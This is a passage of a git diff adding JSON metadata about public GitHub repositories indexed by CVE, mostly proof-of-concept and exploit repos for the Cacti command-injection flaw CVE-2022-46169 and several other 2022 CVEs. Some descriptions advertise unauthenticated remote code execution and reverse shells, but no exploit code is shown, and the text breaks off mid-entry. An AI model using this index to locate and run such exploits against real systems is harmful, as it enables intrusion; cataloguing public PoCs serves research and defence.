"CVE-2022-46169", + "full_name": "doosec101\/CVE-2022-46169", + "owner": { + "login": "doosec101", + "id": 128431701, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128431701?v=4", + "html_url": "https:\/\/github.com\/doosec101", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/doosec101\/CVE-2022-46169", + "description": "Repo for CVE-2022-46169", + "fork": false, + "created_at": "2023-03-20T22:54:18Z", + "updated_at": "2023-03-20T23:57:27Z", + "pushed_at": "2023-03-21T04:56:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 622325901, + "name": "cacti-rce-cve-2022-46169-vulnerable-application", + "full_name": "m3ssap0\/cacti-rce-cve-2022-46169-vulnerable-application", + "owner": { + "login": "m3ssap0", + "id": 705120, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/705120?v=4", + "html_url": "https:\/\/github.com\/m3ssap0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m3ssap0\/cacti-rce-cve-2022-46169-vulnerable-application", + "description": "WARNING: This is a vulnerable application to test the exploit for the Cacti command injection (CVE-2022-46169). Run it at your own risk!", + "fork": false, + "created_at": "2023-04-01T19:20:29Z", + "updated_at": "2023-09-22T17:23:40Z", + "pushed_at": "2023-04-03T11:01:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cacti", + "command-injection", + "cve-2022-46169", + "rce", + "vulnerable-application" + ], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 622368239, + "name": "CVE-2022-46169_poc", + "full_name": "devAL3X\/CVE-2022-46169_poc", + "owner": { + "login": "devAL3X", + "id": 40294005, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40294005?v=4", + "html_url": "https:\/\/github.com\/devAL3X", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/devAL3X\/CVE-2022-46169_poc", + "description": null, + "fork": false, + "created_at": "2023-04-01T22:37:37Z", + "updated_at": "2023-04-01T22:37:46Z", + "pushed_at": "2023-04-13T15:18:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 625050292, + "name": "CVE-2022-46169_unauth_remote_code_execution", + "full_name": "JacobEbben\/CVE-2022-46169_unauth_remote_code_execution", + "owner": { + "login": "JacobEbben", + "id": 112503338, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112503338?v=4", + "html_url": "https:\/\/github.com\/JacobEbben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JacobEbben\/CVE-2022-46169_unauth_remote_code_execution", + "description": "Unauthenticated Remote Code Execution through authentication bypass and command injection in Cacti < 1.2.23 and < 1.3.0", + "fork": false, + "created_at": "2023-04-07T23:40:53Z", + "updated_at": "2023-05-13T16:45:25Z", + "pushed_at": "2023-04-09T11:02:59Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 627335815, + "name": "CVE-2022-46169", + "full_name": "icebreack\/CVE-2022-46169", + "owner": { + "login": "icebreack", + "id": 6855402, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6855402?v=4", + "html_url": "https:\/\/github.com\/icebreack", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/icebreack\/CVE-2022-46169", + "description": "Fixed exploit for CVE-2022-46169 (originally from https:\/\/www.exploit-db.com\/exploits\/51166)", + "fork": false, + "created_at": "2023-04-13T08:55:08Z", + "updated_at": "2023-04-14T17:26:04Z", + "pushed_at": "2023-04-13T08:55:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 634367688, + "name": "CVE-2022-46169", + "full_name": "devilgothies\/CVE-2022-46169", + "owner": { + "login": "devilgothies", + "id": 104858033, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104858033?v=4", + "html_url": "https:\/\/github.com\/devilgothies", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/devilgothies\/CVE-2022-46169", + "description": "PoC for CVE-2022-46169 that affects Cacti 1.2.22 version", + "fork": false, + "created_at": "2023-04-29T22:14:17Z", + "updated_at": "2023-04-29T22:28:21Z", + "pushed_at": "2023-04-29T22:25:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cacti", + "cve-2022-46169", + "poc", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 634502064, + "name": "CVE-2022-46169", + "full_name": "yassinebk\/CVE-2022-46169", + "owner": { + "login": "yassinebk", + "id": 62627838, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62627838?v=4", + "html_url": "https:\/\/github.com\/yassinebk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yassinebk\/CVE-2022-46169", + "description": "CVE-2022-46169", + "fork": false, + "created_at": "2023-04-30T10:37:44Z", + "updated_at": "2023-04-30T10:37:52Z", + "pushed_at": "2023-04-30T10:37:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 634912432, + "name": "CVE-2022-46169", + "full_name": "ruycr4ft\/CVE-2022-46169", + "owner": { + "login": "ruycr4ft", + "id": 103446004, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103446004?v=4", + "html_url": "https:\/\/github.com\/ruycr4ft", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ruycr4ft\/CVE-2022-46169", + "description": "Exploit for cacti version 1.2.22", + "fork": false, + "created_at": "2023-05-01T14:29:28Z", + "updated_at": "2023-10-11T14:48:00Z", + "pushed_at": "2023-10-11T14:48:53Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 635027757, + "name": "CVE-2022-46169-CACTI-1.2.22", + "full_name": "FredBrave\/CVE-2022-46169-CACTI-1.2.22", + "owner": { + "login": "FredBrave", + "id": 114189847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114189847?v=4", + "html_url": "https:\/\/github.com\/FredBrave", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FredBrave\/CVE-2022-46169-CACTI-1.2.22", + "description": "This is a exploit of CVE-2022-46169 to cacti 1.2.22. This exploit allows through an RCE to obtain a reverse shell on your computer.", + "fork": false, + "created_at": "2023-05-01T20:00:23Z", + "updated_at": "2024-09-09T23:16:52Z", + "pushed_at": "2023-09-11T17:56:27Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 38, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 635123796, + "name": "RCE-Cacti-1.2.22", + "full_name": "sha-16\/RCE-Cacti-1.2.22", + "owner": { + "login": "sha-16", + "id": 89037170, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89037170?v=4", + "html_url": "https:\/\/github.com\/sha-16", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sha-16\/RCE-Cacti-1.2.22", + "description": "Este es un código del exploit CVE-2022-46169, que recree utilizando Python3! Si por ahí estás haciendo una máquina de HTB, esto te puede ser útil... 🤞✨ ", + "fork": false, + "created_at": "2023-05-02T02:41:44Z", + "updated_at": "2024-10-31T16:23:19Z", + "pushed_at": "2023-05-02T03:36:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 635433764, + "name": "CVE-2022-46169", + "full_name": "Safarchand\/CVE-2022-46169", + "owner": { + "login": "Safarchand", + "id": 38681779, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38681779?v=4", + "html_url": "https:\/\/github.com\/Safarchand", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Safarchand\/CVE-2022-46169", + "description": "Improved PoC for Unauthenticated RCE on Cacti <= 1.2.22 - CVE-2022-46169", + "fork": false, + "created_at": "2023-05-02T17:26:11Z", + "updated_at": "2023-05-04T17:07:23Z", + "pushed_at": "2023-05-02T17:50:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cacti-rce", + "cve-2022-46169", + "poc", + "rce" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 635946571, + "name": "CVE-2022-46169", + "full_name": "MarkStrendin\/CVE-2022-46169", + "owner": { + "login": "MarkStrendin", + "id": 638560, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/638560?v=4", + "html_url": "https:\/\/github.com\/MarkStrendin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MarkStrendin\/CVE-2022-46169", + "description": "Proof of concept \/ CTF script for exploiting CVE-2022-46169 in Cacti, versions >=1.2.22", + "fork": false, + "created_at": "2023-05-03T19:53:01Z", + "updated_at": "2023-05-03T19:54:22Z", + "pushed_at": "2023-05-03T19:56:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 636441307, + "name": "CVE-2022-46169", + "full_name": "BKreisel\/CVE-2022-46169", + "owner": { + "login": "BKreisel", + "id": 1513073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1513073?v=4", + "html_url": "https:\/\/github.com\/BKreisel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BKreisel\/CVE-2022-46169", + "description": "🐍 Python Exploit for CVE-2022-46169", + "fork": false, + "created_at": "2023-05-04T21:21:05Z", + "updated_at": "2023-05-04T22:04:32Z", + "pushed_at": "2023-05-04T22:03:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-46169", + "exploit", + "python" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 640014872, + "name": "EH2-PoC", + "full_name": "Rickster5555\/EH2-PoC", + "owner": { + "login": "Rickster5555", + "id": 92229061, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92229061?v=4", + "html_url": "https:\/\/github.com\/Rickster5555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rickster5555\/EH2-PoC", + "description": "A simple PoC for CVE-2022-46169 a.k.a Cacti Unauthenticated Command Injection, a vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti prior from version 1.2.17 to 1.2.22", + "fork": false, + "created_at": "2023-05-12T19:08:45Z", + "updated_at": "2023-05-12T19:29:22Z", + "pushed_at": "2023-05-15T02:36:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 643437445, + "name": "CVE-2022-46169", + "full_name": "antisecc\/CVE-2022-46169", + "owner": { + "login": "antisecc", + "id": 92209707, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92209707?v=4", + "html_url": "https:\/\/github.com\/antisecc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/antisecc\/CVE-2022-46169", + "description": null, + "fork": false, + "created_at": "2023-05-21T06:43:17Z", + "updated_at": "2023-05-21T06:44:18Z", + "pushed_at": "2023-05-21T06:48:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 673282845, + "name": "CVE-2022-46169", + "full_name": "dawnl3ss\/CVE-2022-46169", + "owner": { + "login": "dawnl3ss", + "id": 52249849, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52249849?v=4", + "html_url": "https:\/\/github.com\/dawnl3ss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dawnl3ss\/CVE-2022-46169", + "description": "Unauthenticated Command Injection in Cacti <= 1.2.22", + "fork": false, + "created_at": "2023-08-01T09:29:30Z", + "updated_at": "2023-08-01T09:30:11Z", + "pushed_at": "2023-08-01T09:31:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 685095951, + "name": "CVE-2022-46169", + "full_name": "a1665454764\/CVE-2022-46169", + "owner": { + "login": "a1665454764", + "id": 143511005, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143511005?v=4", + "html_url": "https:\/\/github.com\/a1665454764", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/a1665454764\/CVE-2022-46169", + "description": "CVE-2022-46169", + "fork": false, + "created_at": "2023-08-30T14:03:41Z", + "updated_at": "2023-11-09T02:46:53Z", + "pushed_at": "2023-08-30T14:06:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 689539220, + "name": "CVE-2022-46169-Exploit", + "full_name": "0xZon\/CVE-2022-46169-Exploit", + "owner": { + "login": "0xZon", + "id": 52760493, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52760493?v=4", + "html_url": "https:\/\/github.com\/0xZon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xZon\/CVE-2022-46169-Exploit", + "description": null, + "fork": false, + "created_at": "2023-09-10T06:03:22Z", + "updated_at": "2023-09-10T06:03:53Z", + "pushed_at": "2023-09-10T06:28:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 689709304, + "name": "PricklyPwn", + "full_name": "copyleftdev\/PricklyPwn", + "owner": { + "login": "copyleftdev", + "id": 11798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11798?v=4", + "html_url": "https:\/\/github.com\/copyleftdev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/copyleftdev\/PricklyPwn", + "description": "An advanced RCE tool tailored for exploiting a vulnerability in Cacti v1.2.22. Crafted with precision, this utility aids security researchers in analyzing and understanding the depth of the CVE-2022-46169 flaw. Use responsibly and ethically.", + "fork": false, + "created_at": "2023-09-10T17:00:50Z", + "updated_at": "2024-04-29T05:12:05Z", + "pushed_at": "2023-09-10T17:14:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cacti", + "command-injection", + "cve-2022-46169", + "cybersecurity", + "ethical-hacking", + "exploitation-tool", + "payload", + "penetration-testing", + "rce", + "remote-command-execution", + "reverse-shell", + "security", + "vulnerability-assessment" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 722684867, + "name": "CVE-2022-46169", + "full_name": "0xN7y\/CVE-2022-46169", + "owner": { + "login": "0xN7y", + "id": 70061541, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70061541?v=4", + "html_url": "https:\/\/github.com\/0xN7y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xN7y\/CVE-2022-46169", + "description": "Exploit for CVE-2022-46169 ", + "fork": false, + "created_at": "2023-11-23T17:36:20Z", + "updated_at": "2023-11-24T04:38:07Z", + "pushed_at": "2023-12-07T08:02:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 778972816, + "name": "CVE-2022-46169", + "full_name": "mind2hex\/CVE-2022-46169", + "owner": { + "login": "mind2hex", + "id": 51345640, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51345640?v=4", + "html_url": "https:\/\/github.com\/mind2hex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mind2hex\/CVE-2022-46169", + "description": null, + "fork": false, + "created_at": "2024-03-28T19:23:56Z", + "updated_at": "2024-03-28T19:44:04Z", + "pushed_at": "2024-03-28T19:24:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814041598, + "name": "CVE-2022-46169", + "full_name": "HPT-Intern-Task-Submission\/CVE-2022-46169", + "owner": { + "login": "HPT-Intern-Task-Submission", + "id": 169382051, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/169382051?v=4", + "html_url": "https:\/\/github.com\/HPT-Intern-Task-Submission", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HPT-Intern-Task-Submission\/CVE-2022-46169", + "description": null, + "fork": false, + "created_at": "2024-06-12T08:24:30Z", + "updated_at": "2024-06-14T03:02:02Z", + "pushed_at": "2024-06-14T03:01:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46175.json b/2022/CVE-2022-46175.json new file mode 100644 index 0000000000..719dfecff9 --- /dev/null +++ b/2022/CVE-2022-46175.json @@ -0,0 +1,33 @@ +[ + { + "id": 587725691, + "name": "quasar-app-webpack-json5-vulnerability", + "full_name": "giz-berlin\/quasar-app-webpack-json5-vulnerability", + "owner": { + "login": "giz-berlin", + "id": 82261342, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82261342?v=4", + "html_url": "https:\/\/github.com\/giz-berlin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/giz-berlin\/quasar-app-webpack-json5-vulnerability", + "description": "Reproduction for CVE-2022-46175", + "fork": false, + "created_at": "2023-01-11T12:48:17Z", + "updated_at": "2023-05-08T07:15:54Z", + "pushed_at": "2023-01-11T12:48:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46196.json b/2022/CVE-2022-46196.json new file mode 100644 index 0000000000..5dc62d25be --- /dev/null +++ b/2022/CVE-2022-46196.json @@ -0,0 +1,33 @@ +[ + { + "id": 634625371, + "name": "CVE-2022-46196", + "full_name": "dpgg101\/CVE-2022-46196", + "owner": { + "login": "dpgg101", + "id": 16139822, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16139822?v=4", + "html_url": "https:\/\/github.com\/dpgg101", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dpgg101\/CVE-2022-46196", + "description": null, + "fork": false, + "created_at": "2023-04-30T18:23:41Z", + "updated_at": "2023-09-02T15:53:16Z", + "pushed_at": "2023-04-30T18:31:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46381.json b/2022/CVE-2022-46381.json new file mode 100644 index 0000000000..7ae29f511a --- /dev/null +++ b/2022/CVE-2022-46381.json @@ -0,0 +1,33 @@ +[ + { + "id": 578333493, + "name": "CVE-2022-46381", + "full_name": "amitlttwo\/CVE-2022-46381", + "owner": { + "login": "amitlttwo", + "id": 55759090, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55759090?v=4", + "html_url": "https:\/\/github.com\/amitlttwo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amitlttwo\/CVE-2022-46381", + "description": null, + "fork": false, + "created_at": "2022-12-14T20:07:52Z", + "updated_at": "2022-12-14T20:07:52Z", + "pushed_at": "2022-12-14T20:07:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46395.json b/2022/CVE-2022-46395.json new file mode 100644 index 0000000000..0fa22549f9 --- /dev/null +++ b/2022/CVE-2022-46395.json @@ -0,0 +1,95 @@ +[ + { + "id": 660325966, + "name": "CVE_2022_46395_Gazelle", + "full_name": "Pro-me3us\/CVE_2022_46395_Gazelle", + "owner": { + "login": "Pro-me3us", + "id": 106105250, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106105250?v=4", + "html_url": "https:\/\/github.com\/Pro-me3us", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pro-me3us\/CVE_2022_46395_Gazelle", + "description": "CVE-2022-46395 POC for FireTV 3rd gen Cube (gazelle) ", + "fork": false, + "created_at": "2023-06-29T18:54:27Z", + "updated_at": "2024-03-19T15:37:48Z", + "pushed_at": "2023-12-06T15:17:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 660326548, + "name": "CVE_2022_46395_Raven", + "full_name": "Pro-me3us\/CVE_2022_46395_Raven", + "owner": { + "login": "Pro-me3us", + "id": 106105250, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106105250?v=4", + "html_url": "https:\/\/github.com\/Pro-me3us", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pro-me3us\/CVE_2022_46395_Raven", + "description": "CVE-2022-46395 POC for FireTV 2nd gen Cube (raven) ", + "fork": false, + "created_at": "2023-06-29T18:56:04Z", + "updated_at": "2024-03-19T15:37:19Z", + "pushed_at": "2024-03-19T15:28:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 821484239, + "name": "CVE-2022-46395", + "full_name": "SmileTabLabo\/CVE-2022-46395", + "owner": { + "login": "SmileTabLabo", + "id": 112930114, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112930114?v=4", + "html_url": "https:\/\/github.com\/SmileTabLabo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SmileTabLabo\/CVE-2022-46395", + "description": null, + "fork": false, + "created_at": "2024-06-28T16:37:46Z", + "updated_at": "2024-11-27T11:16:27Z", + "pushed_at": "2024-06-28T17:07:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": true, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46463.json b/2022/CVE-2022-46463.json new file mode 100644 index 0000000000..3c0c7585f6 --- /dev/null +++ b/2022/CVE-2022-46463.json @@ -0,0 +1,64 @@ +[ + { + "id": 590053195, + "name": "CVE-2022-46463", + "full_name": "nu0l\/CVE-2022-46463", + "owner": { + "login": "nu0l", + "id": 54735907, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54735907?v=4", + "html_url": "https:\/\/github.com\/nu0l", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nu0l\/CVE-2022-46463", + "description": "CVE-2022-46463(Harbor 未授权)", + "fork": false, + "created_at": "2023-01-17T14:58:14Z", + "updated_at": "2024-10-23T10:06:01Z", + "pushed_at": "2023-01-19T12:47:21Z", + "stargazers_count": 24, + "watchers_count": 24, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 24, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 616913153, + "name": "CVE-2022-46463", + "full_name": "404tk\/CVE-2022-46463", + "owner": { + "login": "404tk", + "id": 54827262, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54827262?v=4", + "html_url": "https:\/\/github.com\/404tk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/404tk\/CVE-2022-46463", + "description": "harbor unauthorized detection", + "fork": false, + "created_at": "2023-03-21T10:40:19Z", + "updated_at": "2024-11-18T14:27:57Z", + "pushed_at": "2024-11-02T09:29:29Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 26, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46484.json b/2022/CVE-2022-46484.json new file mode 100644 index 0000000000..33cf7929b8 --- /dev/null +++ b/2022/CVE-2022-46484.json @@ -0,0 +1,33 @@ +[ + { + "id": 570868199, + "name": "CVE-2022-46484", + "full_name": "WodenSec\/CVE-2022-46484", + "owner": { + "login": "WodenSec", + "id": 112494665, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112494665?v=4", + "html_url": "https:\/\/github.com\/WodenSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WodenSec\/CVE-2022-46484", + "description": " Information disclosure in password protected surveys in Data Illusion Survey Software Solutions NGSurvey v2.4.28 and below allows attackers to view the password to access and arbitrarily submit surveys.", + "fork": false, + "created_at": "2022-11-26T11:49:09Z", + "updated_at": "2024-05-12T20:03:15Z", + "pushed_at": "2023-01-11T09:17:14Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46485.json b/2022/CVE-2022-46485.json new file mode 100644 index 0000000000..d303d8e021 --- /dev/null +++ b/2022/CVE-2022-46485.json @@ -0,0 +1,33 @@ +[ + { + "id": 566891894, + "name": "CVE-2022-46485", + "full_name": "WodenSec\/CVE-2022-46485", + "owner": { + "login": "WodenSec", + "id": 112494665, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112494665?v=4", + "html_url": "https:\/\/github.com\/WodenSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WodenSec\/CVE-2022-46485", + "description": "An issue in Data Illusion Survey Software Solutions NGSurvey v2.4.28 and below allows attackers to cause a Denial of Service (DoS) via a crafted survey.", + "fork": false, + "created_at": "2022-11-16T16:26:34Z", + "updated_at": "2023-01-11T10:12:05Z", + "pushed_at": "2023-01-13T15:41:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + 